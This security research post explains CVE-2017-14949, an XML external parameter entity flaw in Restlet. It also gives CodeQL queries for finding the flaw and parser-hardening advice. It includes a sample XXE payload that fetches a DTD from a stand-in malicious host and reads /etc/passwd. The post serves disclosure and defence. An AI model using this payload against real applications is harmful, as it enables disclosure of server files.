In a previous post, I described a particular type of XML External Entity vulnerability (XXE) and presented an information disclosure vulnerability I found in Restlet as an example. In this post, I will explain another type of XXE, which uses a different type of XML entity to carry out an attack: the parameter entity. I will use another information disclosure vulnerability I found in Restlet as an example to illustrate this type of attack.

Details of the vulnerability in Restlet (CVE-2017-14949)

This information disclosure vulnerability affects the DOMRepresentation in the XML extension of Restlet. It allows a remote attacker to potentially access arbitrary files on the system by sending a request with maliciously crafted XML data to an application that uses the Restlet library to provide a REST API. We strongly advise you to urgently upgrade Restlet to version 2.3.12 (or higher).

XML parameter entities

Parameter entities are a special type of XML entity that can only be used within the Document Type Declaration (DTD). For example, in the following snippet, remote is defined as an external parameter entity. It is defined with a % as a prefix and cannot be used outside of the DTD.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ELEMENT foo ANY>
   <!ENTITY % remote SYSTEM "http://codeql.com" > 
   %remote;
]>

On the face of it, parameter entities look fairly harmless, as they can only be used within the DTD. Combining external parameter entities and internal general entities, however, allows attacker to bypass some restrictions of the XML standard. The article XML Data Retrieval by Timur Yunsov and Alexey Osipov lists some good examples. Even when external general entities are disabled, an attacker can still carry out an XXE attack by sending a vulnerable application a payload with XML data containing an external parameter entity, for example:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ELEMENT foo ANY>
   <!ENTITY % remote SYSTEM "http://some_malicious_domain/malicious.dtd" > 
   %remote;
   %param1;
]>
<string>&internal;</string>

Because external parameter entities are allowed, the entity remote will be expanded when the data is parsed, which will then fetch another part of the DTD from a malicious website set up by the attacker. The content of this DTD contains the definition of the internal entity internal, for example:

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY internal '%payload;'>">
%param1;

Upon parsing the XML data, any references to internal will be replaced by the content of the file /etc/passwd.

Developers are often not aware of the fact that disabling general external entities does not fully protect them against XXE attacks. This is exactly what happened in Restlet.

Looking for XXE in Restlet

Restlet has a class called ConverterHelper, whose subclasses are used to process input data from http requests (If you have read my posts on Struts: this class is similar to Struts’ ContentTypeHandler class). The input data in Restlet is held in subclasses of Representation, which are passed to the toObject method of ConverterHelper. Therefore, writing a query that looks for XXE vulnerabilities in Restlet is very similar to writing the one that looks for unsafe deserialization in Struts.

First, we define QL classes that look for the toObject method in ConverterHelper and the class Representation:

/** The class 'Representation' */
class Representation extends RefType {
  Representation() {
    this.hasName("Representation")
  }
}

/** The method 'toObject' in the class 'ConverterHelper' */
class ConverterHelperToObject extends Method {
  ConverterHelperToObject() {
     this.hasName("toObject") and
     this.getDeclaringType().hasQualifiedName("org.restlet.engine.converter", "ConverterHelper")
  }
}

In the definition of Representation, I used the short-hand method hasName to just look for classes with name Representation instead of looking for the fully qualified name with package information. This simplifies the code and is fine if the project only uses a single class named Representation. If I run a query that looks for instances of Representation or ConverterHelperToObject, I find where they are declared in Restlet. Just like during my Struts research, I want to look for cases where remote Representation instances end up flowing into a method that performs unsafe parsing of XML data. As remote Representation are passed into overrides of the toObject method of ConverterHelper as the first argument, I write a class that locates accesses to these arguments:

/** An access to the first argument of the 'toObject' method **/
class ConverterHelperSource extends FlowSource, VarAccess {
  ConverterHelperSource() {
    exists(Method m, ConverterHelperToObject toObject |
      // Access to the first argument of a method
      this = m.getParameter(0).getAnAccess() and
      // This method should overrides the 'toObject' method of 'ConverterHelper'
      m.overrides*(toObject)
    )
  }
}

Running the query, we find the places where these arguments are accessed. It is now tempting to use ConverterHelperSource as a source and XmlParserCall as a sink to find unsafe parsing of remote XML data. Doing so, however, will give no result. This is because ConverterHelperSource are instances of Representation, which are never passed into the argument of an XML parser. Instead, the data inside these Representation objects are passed into XML parsers, and it is this data that we would like to track. Therefore, we need to define a QL class that locates calls to methods which disclose the data we’re looking for:

/** A method either named 'getInputSource', 'getStream' or 'getReader' **/
class TaintMethod extends Method {
  TaintMethod() {
    this.hasName("getInputSource") or this.hasName("getStream") or this.hasName("getReader")
  }
}

/** Internal data of instances of 'Representation' being accessed **/ 
class TaintSource extends FlowSource, MethodAccess {
  TaintSource() {
    exists(Method m | m = this.getMethod() and
      // An access to methods with name 'getInputSource', 'getStream' or 'getReader' 
      // and the object where these methods are accessed is an instance a subclass
      // of `Representation`.
      m instanceof TaintMethod and 
      this.getQualifier().getType().(RefType).getSourceDeclaration().getASupertype*() instanceof Representation
    )
  }
}

I will now use both ConverterHelperSource and TaintSource together for taint tracking. I want to track a TaintSource whose Representation comes from a ConverterHelperSource that flows into an unsafe XML parsing call.

from ConverterHelperSource s, TaintSource source, XmlParserCall c
where not c.isSafe() and
      // TaintSource flows into unsafe XML parsing call.
      source.flowsTo(c.getSink()) and
      // TaintSource comes from a `ConverterHelperSource`
      s.flowsTo(source.getQualifier())
select s, source, c

Running the final query then returns all locations where unsafe parsing may occur.

Configuring XML parsers is not straightforward!

From the result, I see that the DOMRepresentation is parsing XML data in an unsafe way. The DOMRepresentation uses a DocumentBuilder to parse XML data, which it obtains from the getDocumentBuilder method. Note that in this case, the DocumentBuilderFactory is configured to disable external entities by setting the expandingEntityRefs attribute to false. While this does disable general external entities, it still allows expansion of parameter external entities. Unfortunately, the Java SE Javadoc does not explain this at all.

This is a common mistake in the configuration of DocumentBuilder entities. In fact, not even the OWASP guideline is clear enough in this case. The guideline suggests the following:

// If you can't completely disable DTDs, then at least do the following:
// Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-general-entities
// Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-general-entities
// JDK7+ - http://xml.org/sax/features/external-general-entities
FEATURE = "http://xml.org/sax/features/external-general-entities";
dbf.setFeature(FEATURE, false);
 
// Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-parameter-entities
// Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-parameter-entities
// JDK7+ - http://xml.org/sax/features/external-parameter-entities
FEATURE = "http://xml.org/sax/features/external-parameter-entities";
dbf.setFeature(FEATURE, false);

However, it is not clear that both of these features have to be disabled to prevent XXE. All Java projects using GitHub code scanning with CodeQL.com are analysed using the XXE query to check that both of these attributes are disabled. Project maintainers are encouraged to check the results for their projects and take immediate action if necessary.

In general, to mitigate the risk of XXE, follow the guidelines in OWASP to properly configure XML parsers.

Restlet vulnerability disclosure timeline

Note: This post was originally published on LGTM.com on October 17, 2017